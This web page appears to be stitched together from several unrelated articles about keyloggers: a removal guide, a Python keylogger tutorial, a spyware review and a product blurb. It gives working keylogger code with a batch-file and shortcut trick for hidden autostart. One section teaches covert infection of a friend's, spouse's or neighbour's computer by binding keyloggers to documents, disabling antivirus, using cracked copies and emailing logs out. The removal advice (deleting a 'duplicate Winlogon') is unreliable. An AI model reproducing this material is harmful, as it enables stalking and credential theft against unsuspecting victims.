What is a keylogger used for?              Information Security Laboratory Search and removal of keyloggers

There are various types of tricks used by hackers to steal our identity.

Keylogger is one malicious application or tool that is used by many hacks to track what we type and for whom and how we connect to the network. Keylogger has become one of the most powerful threats these days that can record what you type and share it with hackers.

Knowing how to detect a keylogger and remove it from your computer can help protect your identity and privacy.

Step-by-step guide to detect Keylogger and remove it from your computer

It is not easy to detect if your computer is affected by a keylogger unless this guide identifies it. Of course, there are tools and software to detect malicious threats, knowing how to detect them manually can come in handy when it comes to protecting your identity.

Here are two ways by which you can detect whether a keylogger is installed on your device or not:

Method 1. Open the task manager using the keyboard shortcut Ctrl + Alt + Delete. Go to the processes option and look for a duplicate copy of the process named Winlogon. One process with this name is fine, but if there are two of them, then your device is infected with a keylogger.

Method 2: Sometimes the keylogger infects the device through some malware that is automatically installed on your device when we are online. Searching for the unwanted program in Control Panel may reveal a keylogger. Here's how to detect an unwanted program from Control Panel:

Go to the Start menu, select All Programs, and view all installed programs. If you find any program that you did not install, uninstall it. After removing an unnecessary program, you need to restart your device.

How to remove Keylogger

Once you know how to detect a keylogger, you should know how to remove it from your computer. The key locker can be removed from the device using the following two methods:

Method 1. If you find a keylogger in the task manager, delete the duplicate copy of Winlogon.

Method 2. If you find an unknown program installed on your system, uninstall the program.

These two are the easiest ways to detect and remove keylogger manually from your system. Manual methods lay the foundation to protect your computer from malicious activities and thus help prevent any data from being stolen.

There are also software available in the market that can help you detect keyloggers and remove them from your computer. You can learn how to detect a keylogger and remove it from your computer by installing software that can detect and remove the malicious tool.

The software scans your computer for any malicious file that is capable of stealing information stored in it and sending it to hackers.

When malicious files are detected, the software quarantines them and processes them, deleting or restoring them after your team searches.

The software not only scans the computer, but also prevents or protects the computer by disabling the automatic installation of any program that may be at risk.

Keylogger has become a major threat as more people use digital gadgets for various tasks. Be it an online transaction or private chats, keyloggers can hack the details and record everything you type using our device's keyboard.

Two types of keyloggers and how they affect your computer.

Keylogger has two types: hardware keylogger and software keylogger.

Keylogger Hardware:

Hardware keylogger comes in the form of USB devices that can be connected to the computer system. This particular type of keylogger is built into the back of the central processing unit (CPU) and captures keyboard activity.

Keylogger Software:

A software keylogger is built into the software and program installed or installed on your computer. When we install any software on a computer system, certain files are automatically created. These files can be evil and can record and steal information from your computer.

No matter what type of keylogger your computer is affected by, each keylogger can cause irreversible losses.

Therefore, it is extremely important to detect the keylogger promptly to prevent any important data from being stolen.

You can protect your computer by updating your antivirus software. The use of virus detectors often also helps to detect and prevent any malic program.

There is also one trick to prevent you from losing any type of information through the keyboard, you can store data like username and password in a notepad and copy and paste the details when needed.

However, in this case, you will need to be extra aware of the data stored in the notepad as hackers can steal the information. The risk of hacking is everywhere, but it shouldn't stop us from using digital gadgets.

Use smart devices with vigilance. Don't let something like a keylogger stop you from moving forward on your path. Make sure your computer system is up to date and all programs are functioning properly.

Running antivirus software regularly can also help protect your computer when you're online as well as offline.

Hello, QUAZAR is here again. Today I will show you how to create a simple keylogger in Python. Of course, this keylogger cannot compete with such giants as, but despite this, it can find its use.

What is a keylogger?

You can read in detail about what a keylogger is and about the types of keyloggers in the article ““. To find additional materials on the topic, use the site search, which is located in the upper right corner. Just enter the word "keylogger" or "keylogger".

Simple keylogger in Python

To create a keylogger we need:

• Operating system: Windows or MacOs (any Linux can also be used, but I haven't tried it personally)
• Python installed on the target machine, as well as special libraries.

This material is for informational purposes only. The information presented in this article is provided for informational purposes only. Neither the editors of the website www.site nor the author of the publication bear any responsibility for any harm caused by the material in this article.

Creating a Simple Keylogger in Python

First you need to download and install Python.

Simple keylogger in Python

After installing Python, you need to install the "pyHook" and "pywin32" modules. On this site you will find 32 and 64 bit versions for Windows and other OSes. Download "PYhook" and "pyWin32" according to your installed version of Python and Windows (32bit or 64bit).

Keylogger in Python. PYhook module
Keylogger in Python. pyWin32 module

Once downloaded, install and open IDLE (Python GUI) menu from the Start menu.

Simple keylogger in Python

Go to the “File” menu and click on the “New File” item. Then paste the keylogger code:

#Name: QUAZAR
#Website: www.site
import pyHook, pythoncom, sys, logging
file_log = "C:keyloggerlog.txt"
def OnKeyboardEvent(event):
logging.basicConfig(filename=file_log, level=logging.DEBUG, format="%(message)s")
chr(event.Ascii)
logging.log(10,chr(event.Ascii))
return True
hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()

And save it by calling the file Keylogger.pyw. Just don't save the file in the root directory C: where you need administrator rights to copy and delete files. Create a new folder on your C: drive or some other location where you don't need administrator rights to copy files and save Keylogger.pyw there.

You can select any location as the output report file “file_log = “C:keyloggerlog.txt”, but preferably, of course, some hidden location on your hard drive. In this example, I will save the report file to disk in the root directory C:. After all, I have nothing to hide.

Automatic launch of a keylogger in Python

The keylogger is ready. Now we need to make sure that the keylogger starts hidden from the user and automatically when Windows boots. This can be implemented in different ways. Let's try to do it using a bat file by linking the launch of the keylogger to some program or by registering it in startup.

First, create a bat file. Copy and paste the following code into Notepad:

::Name: QUAZAR
::Website: www.site
@echo off
start "" "C:keyloggerkeylogger.pyw"
start "" "C:Program FilesOperalauncher.exe"

In the first line you need to enter the path to the keylogger.pyw file (in my case “C:keylogger.pyw”). In the second line, you must enter the path to the program that the user usually uses (in my case, the Opera browser).

After editing, save the file with a .bat extension (in my case logger.bat) in some hidden location on your computer (in my case in “C:keylogger.bat”).

Now go to the desktop and select a shortcut for a frequently used program (in my case, this is the Opera browser). Right-click the mouse to call up the context menu and go to the shortcut properties. In the “Object” field, enter the path to the keylogger bat file “C:keyloggerlogger.bat”.

After making changes, the shortcut icon will also change. But this can be easily solved on the properties tab (see screenshot above).

Various spy programs are necessary in conditions where many people have access to one computer.

In these circumstances, the user may want to know which sites were visited from his computer (for example, by children), whether credit cards were stolen using saved passwords, etc. To clarify these issues, it will be necessary.

Our review will allow you to make the best choice.

Features of choice

What exactly is a keylogger? This is a program that, strictly speaking, is not directly related to the keyboard.

It is installed in the computer's memory and acts on. Often, signs of its activity are not visible on the computer unless you specifically look for them.

Such a program interacts indirectly with the keyboard, that is, it works with a program on the PC that converts the signals received by the processor as a result of pressing buttons into text when printing.

That is, the action of such software is aimed at collecting information entered through the keyboard.

Such utilities come in different types - with some you can view all the text typed on the keyboard, with others - only what was typed in the browser or in any selected application.

Some programs provide the ability to configure such indicators, others do not.

They also differ from each other in the degree of secrecy. For example, the activity of some is obvious, a shortcut remains on the Desktop, etc., such programs are suitable for monitoring the activities of, for example, children.

Traces of the presence and activity of others are not noticeable at all - they act hidden and are suitable for installation on someone else’s computer, when the fact of installation needs to be hidden from a third-party user.

Given such diversity, choosing the most suitable software can be quite difficult.

This material presents the TOP of the best programs that can be used for this purpose. It is easier to choose the right one among them.

Specifications

To simplify the software selection process, the table below shows the main comparative characteristics of all programs included in the TOP.

Name	License type	Type of information collected	Functional	Design
SC-KeyLog	For free	All	Wide	Simplified
WideStep Handy Keylogger	Free/Paid	All	Wide	Improved
Actual Spy	Paid	All	Very wide	Standard
EliteKeylogger	Paid	All	Wide	Standard
The Rat!	Free/Paid	Less than previous	Quite wide	Unaesthetic
SPYGO	For free	Depending on version	Depending on version	Standard Windows appearance
Ardamax Keylogger 2.9	For free	From the keyboard	Narrowed	Simplified
NS Keylogger Personal Monitor 3.8	For free	All	Narrowed	Simplified
KGB Spy	Paid	From the keyboard + open programs	Narrow	Simple
Golden Keylogger 1.32	For free	From the keyboard	Very narrow	Simple

Based on the characteristics from this table, it is easy to choose the program that best suits your specific requirements.

These utilities are described in more detail below.

SC-KeyLog

This is a voluminous and functional spy program that is distributed free of charge.

In addition to specifically tracking information entered from the keyboard, it is also able to collect addresses of visited sites, passwords, and open browser windows.

Provides complete information about all actions performed on the computer. In this case, the generated file can be viewed remotely from another device.

• Possibility of remote access to a file from another device;
• No traces of program activity on the computer with the correct settings;
• Variety of collected data - information about almost all actions on the PC can be accessed.

• Saves passwords only up to NT0;
• Too simple menu and unaesthetic design;
• A rather inconvenient format for displaying the result.

What do users who actively use this software say? “Absolutely invisible to the user”, “Data arrives regularly by email.”

WideStep Handy Keylogger

This application is distributed free of charge. The full paid version costs $35.

Quite an interesting and functional program that is worth the money if you are willing to pay it.

Distinctive feature– the ability to send recorded data at a specified frequency. Otherwise it works fine, often more stable than other programs on this list.

• Collection of various types of information;
• Complete invisibility of work on the user’s computer;
• Simple interface and controls.

• The design is better than the previous program, but still not great;
• The result display format is inconvenient;
• The paid version is quite expensive.

Users' opinions about this software are as follows: “Convenient, simple and functional program. Quite invisible when working.”

Actual Spy

This is a functional and complex paid program that costs 600 rubles. However, it has a demo version that is free.

Feature of this software– ability in a given period of time.

This helps solve the problem of entering a graphic password/key, which has recently become widespread.

• Many types of information collected plus the ability to take screenshots from the screen during a specified period;
• A large number of other additional functions and features;
• Records not only actions, but also the time they were performed;
• Encrypts the generated log.

• The duration of work (collection of information) in the free demo version is 40 minutes;
• Paid distribution, although a more or less reasonable price;
• The weight of the program is quite large.

User reviews of this application are as follows: “The program is excellent. Well done programmers!”

EliteKeylogger

Paid program with a fairly high price– 69 dollars. It operates completely undetectably on a PC in low-level mode, making it almost completely undetectable.

Interesting and convenient feature– automatic launch of software, occurring simultaneously with the launch of the system itself.

It is difficult to detect or not detected at all even by special anti-keyloggers.

• Completely hidden action and difficult to detect;
• Low-level driver-type operating format and automatic startup when the system boots;
• It also tracks the presses of not only the main, but also the service keys on the keyboard.

• A rather complex system for installing the program on a PC;
• The program is expensive, but you can find an old hacked version on the Russian Internet;
• A rather complex system of individual program settings, which, however, justifies itself.

What do users say about this software? “Good program”, “A little short of Jetlogger.”

The Rat!

Quite a common and popular, functional utility with a paid license.

However, for private use, a free demo version is provided for a limited period.

The program is very simple– any advanced user can write the same. However, it is completely undetectable by antiviruses and special programs that detect such software.

• Simplicity, functionality and high stability;
• Minimum file weight and space occupied by it on the computer;
• Quite a lot of settings.

• A rather unpleasant design, made in black, white and red;
• The functionality is somewhat narrower than in the programs described before;
• Inconvenient viewing of the log and generally inconvenient interface and use.

Users say the following about this program: “It works stably, but is a bit simple,” “The program is good, it allows you to collect data unnoticed.”

SPYGO

This is a fundamentally new keylogger, designed to work on and developed by a Russian programmer.

Who among us hasn’t wanted to feel like a cool hacker at least once and break at least something? :) Even if not, then let’s talk about how great it would be to get a password from your mail/social network. the network of a friend, wife/husband, roommate thought at least once, everyone. :) Yes, and you have to start somewhere, after all! A significant part of attacks (hacking) involves infecting the victim’s computer with so-called keyloggers (spyware).

So, in today’s article we’ll talk about what are free programs for monitoring windows-based computers, where you can download their full versions, how to infect a victim’s computer with them, and what are the features of their use.

But first, a little introduction.

What are keyloggers and why are they needed?

I think you yourself have guessed what it is. As a rule, they are a kind of program that is hidden (although this is not always the case) installed on the victim’s computer, after which it records absolutely all keystrokes on this node. Moreover, in addition to the clicks themselves, the following is usually recorded: the date and time of the click (action) and the program in which these actions were performed (browser, including the website address (hurray, we immediately see what the passwords are for!); local application; system services (including Windows login passwords), etc.).

From here one of the problems is immediately visible: I got access to my neighbor’s computer for a couple of minutes and I want to get her password from VK! I installed the miracle program and returned the computer. How can I look up passwords later? Looking for a way to take the computer from her again? The good news is: usually not. Most keyloggers are capable of not only storing the entire accumulated database of actions locally, but also sending it remotely. There are many options for sending logs:

• A fixed email (there may be several) is the most convenient option;
• FTP server (who has it);
• SMB server (exotic, and not very convenient).
• A fixed flash drive (you insert it into the USB port of the victim’s computer, and all logs are copied there automatically in invisible mode!).

Why is all this needed? I think the answer is obvious. In addition to the banal stealing of passwords, some keyloggers can do a number of other nice things:

• Logging correspondence in specified social networks. networks or instant messengers (for example, Skype).
• Taking screenshots of the screen.
• View/capture webcam data (which can be very interesting).

How to use keyloggers?

And this is a difficult question. You need to understand that just finding a convenient, functional, good keylogger is not enough.

So, what is needed for a spy program to work successfully?:

• Administrator access to a remote computer.
  Moreover, this does not necessarily mean physical access. You can easily access it via RDP (Remote Desktop Service); TeamViewer; AmmyAdmin, etc.
  As a rule, the greatest difficulties are associated with this point. However, I recently wrote an article about how to get administrator rights in Windows.
• Anonymous e-mail / ftp (by which you will not be identified).
  Of course, if you are breaking Aunt Shura for your neighbor, this point can be safely omitted. As is the case if you always have the victim’s computer at hand (ala, find out your brother/sister’s passwords).
• Lack of working antiviruses / internal Windows protection systems.
  Most public keyloggers (which will be discussed below) are known to the vast majority of antivirus software (although there are logger viruses that are built into the OS kernel or system driver, and antiviruses can no longer detect or destroy them, even if they have detected them). Due to the above, anti-virus software, if any, will have to be mercilessly destroyed. In addition to antiviruses, systems like Windows Defender (these first appeared in Windows 7 and later) also pose a danger to our spyware. They detect suspicious activity in software running on a computer. You can easily find information on how to get rid of them on Google.

These, perhaps, are all the necessary and sufficient conditions for your success in the field of stealing other people’s passwords / correspondence / photos or whatever else you want to encroach on.

What types of spyware are there and where can I download them?

So, let’s begin the review of the main keyloggers that I used in my daily practice with links to free downloads of their full versions (i.e., all versions are the latest at the moment (for which it is possible to find a cure) and with already working and tested cracks).

0. The Rat!

Ratings (out of 10):

• Stealth: 10
• Convenience/usability: 9
• Functionality: 8

It's just a bomb, not a keylogger! In working condition it takes 15-20 KB. Why be surprised: it is written entirely in assembly language (veteran programmers shed tears) and written mostly by enthusiastic hackers, due to which the level of its secrecy is simply amazing: it works at the OS kernel level!

In addition, the package includes FileConnector - a mini-program that allows you to connect this keylogger with absolutely any program. As a result, you get a new exe of almost the same size, and when launched, it works exactly like the program with which you glued it together! But after the first launch, your keylogger will be automatically installed in invisible mode with the parameters for sending logs that you have previously specified. Convenient, isn't it?

An excellent opportunity for social engineering (bring a game file/presentation to a friend on a flash drive, or even just a Word document (I’ll tell you how to create an exe file that launches a specific word/excel file in one of my next articles), launch, everything is fine and wonderful, but the friend is already invisibly infected!). Or you simply send this file to a friend by mail (preferably a link to download it, since modern mail servers prohibit sending exe files). Of course, there is still a risk from antiviruses during installation (but it will not exist after installation).

By the way, with the help of some other techniques you can glue together any hidden installation distribution (these are found in The Rat! and Elite keylogger) not only with exe files (which still raise suspicion among even more or less advanced users), but also with ordinary word / excel and even pdf files! No one will ever think anything about a simple pdf, but that’s not the case! :) How this is done is the topic of a whole separate article. Those who are especially zealous can write me questions through the feedback form. ;)

Overall, The Rat! can be described for a very long time and a lot. This was done much better than me. There is also a download link there.

1. Elite keylogger

Ratings (out of 10):

• Stealth: 10
• Convenience/usability: 9
• Functionality: 8

Perhaps one of the best keyloggers ever created. Its capabilities, in addition to the standard set (interception of all clicks in the context of applications / windows / sites), include interception of instant messenger messages, pictures from a webcam, and also - which is VERY important! - interception of WinLogon service passwords. In other words, it intercepts Windows login passwords (including domain ones!). This became possible thanks to its work at the system driver level and launch even at the OS boot stage. Due to this same feature, this program remains completely invisible to both Kasperosky and all other anti-malware software. Frankly, I have not met a single keylogger capable of this.

However, you shouldn’t delude yourself too much. The installer itself is recognized by antiviruses very easily and to install it you will need administrator rights and disabling all antivirus services. After installation, everything will work perfectly in any case.

In addition, the described feature (working at the OS kernel level) introduces requirements for the OS version on which the keyloggers will work. Version 5-5.3 (links to which are given below) supports everything up to Windows 7, inclusive. Win 8 / 10, as well as Windows server family (2003 / 2008 / 2012) are no longer supported. There is version 6, which functions perfectly, incl. on win 8 and 10, however, it is currently not possible to find a cracked version. It will probably appear in the future. In the meantime, you can download Elite keylogger 5.3 from the link above.

There is no network operation mode, therefore it is not suitable for use by employers (to monitor the computers of their employees) or an entire group of people.

An important point is the ability to create an installation distribution with predefined settings (for example, with a specified email address where logs will need to be sent). At the same time, at the end you get a distribution kit that, when launched, does not display absolutely any warnings or windows, and after installation it can even destroy itself (if you check the appropriate option).

Several screenshots of version 5 (to show how beautiful and convenient everything is):

2. All-in-one keylogger.

Ratings (out of 10):

• Stealth: 3
• Convenience/usability: 9
• Functionality: 8

It is also a very, very convenient thing. The functionality is quite at the level of Elite keylogger. Things are worse with secrecy. Winlogon passwords are no longer intercepted, it is not a driver, and is not built into the kernel. However, it is installed in system and hidden AppData directories, which are not so easily accessible to unauthorized users (not those on whose behalf it is installed). Nevertheless, antiviruses sooner or later successfully do this, which makes this thing not particularly reliable and safe when used, for example, at work to spy on your own superiors. ;) Gluing it to something or encrypting the code to hide it from antiviruses will not work.

Works on any version of Win OS (which is nice and practical).

As for the rest, everything is fine: it logs everything (except Windows login passwords), sends it anywhere (including e-mail, ftp, fixed flash drive). In terms of convenience, everything is also excellent.

3. Spytech SpyAgent.

Ratings (out of 10):

• Stealth: 4
• Convenience/usability: 8
• Functionality: 10

Also a good keylogger, although with dubious secrecy. Supported OS versions are also all possible. The functionality is similar to previous options. There is an interesting self-destruct function after a specified period of time (or upon reaching a predetermined date).

In addition, it is possible to record video from a webcam and sound from a microphone, which can also be very popular and which the previous two representatives do not have.

There is a network mode of operation, which is convenient for monitoring an entire network of computers. By the way, StaffCop has it (it is not included in the review due to its uselessness for one user - an individual). Perhaps this program is ideal for employers to spy on their employees (although the leaders in this field are unconditionally StaffCop and LanAgent - if you are a legal entity, be sure to look in their direction). Or to keep track of your offspring who love to sit and watch “adult sites”. Those. where what is needed is not concealment, but convenience (including a bunch of beautiful log reports, etc.) and functionality for blocking specified sites/programs (SpyAgent also has it).

4. Spyrix Personal monitor.

Ratings (out of 10):

• Stealth: 4
• Convenience/usability: 6
• Functionality: 10

The functionality is at the level of the previous candidate, but the same problems with secrecy. In addition, the functionality includes an interesting thing: copying files from USB drives inserted into the computer, as well as remote viewing of logs through a web account on the Spyrix website (but we are going to download a cracked version, so it will not work for us).

5. Spyrix Personal monitor.

Ratings (out of 10):

• Stealth: 3
• Convenience/usability: 6
• Functionality: 8

I won’t describe it in detail, because... this instance does not have anything that one of the previous spies did not have, however, someone may like this keylogger (at least for its interface).

What do we end up with?

The issue of using a keylogger is more ethical than technical, and it greatly depends on your goals.

If you are an employer who wants to control his employees, feel free to set up StaffCop, collect written permission from all employees for such actions (otherwise you may be seriously charged for such things) and the job is in the bag. Although I personally know more effective ways to increase the performance of my employees.

If you are a novice IT specialist who just wants to experience what it’s like to break someone - and how this thing works in general, then arm yourself with social engineering methods and conduct tests on your friends, using any of the examples given. However, remember: the detection of such activity by victims does not contribute to friendship and longevity. ;) And you definitely shouldn’t test this at your work. Mark my words: I have experience with this. ;)

If your goal is to spy on your friend, husband, neighbor, or maybe you even do it regularly and for money, think carefully about whether it’s worth it. After all, sooner or later they may attract. And it’s not worth it: “rummaging through someone else’s dirty laundry is not a pleasant pleasure.” If you still need to (or maybe you work in the field of investigating computer crimes and such tasks are part of your professional responsibilities), then there are only two options: The Rat! and Elite Keylogger. In the mode of hidden installation distributions, glued with word / excel / pdf. And it’s better, if possible, encrypted with a fresh cryptor. Only in this case can we guarantee safer activities and real success.

But in any case, it is worth remembering that the competent use of keyloggers is only one small link in achieving the goal (including even a simple attack). You don’t always have admin rights, you don’t always have physical access, and not all users will open, read, and even more so download your attachments/links (hello social engineering), the antivirus won’t always be disabled/your keylogger/cryptor won’t always be unknown to them . All these and many untold problems can be solved, but their solution is the topic of a whole series of separate articles.

In short, you have just begun to dive into the complex, dangerous, but incredibly interesting world of information security. :)

Sincerely,Lysyak A.S.

Keylogger is a program that reads the keys pressed and saves them to a file. In the future, you can view what the person wrote at the computer, what messages he typed and what passwords he entered. Another name for a keylogger is a keylogger, from the English “keylogger,” which literally means “recording buttons.”

In the NeoSpy program, the keylogger function is enabled by default; in this mode, the program records text, hotkey combinations and passwords typed on the keyboard. Managing keylogger settings is located in the menu "Tracking Settings" - "Log Recording" - "Keyboard". You can choose one of two operating modes of the program: standard and alternative. It is recommended to use the standard option 99% of the time, but if there is a conflict with your antivirus software, you can enable the alternative mode.

Setting up a keylogger

The keyboard log is always recorded in full format, including service keys. An example of such a log can be seen in the illustration. When viewing the report, you can disable the display of non-printable characters and view the log as simple text, more accessible for free reading.

Keylogger example

To make working with reports easier, typed passwords are highlighted in the list of keystrokes. This way you can find out your child’s passwords and, if necessary, protect him from unwanted acquaintances. If the NeoSpy program is used at an enterprise to monitor employees, then the collection of personal data and correspondence is prohibited by the legislation of most countries, so this option must be disabled, or the employee must be notified in writing about control by management and the inadmissibility of using a computer in the organization for personal correspondence.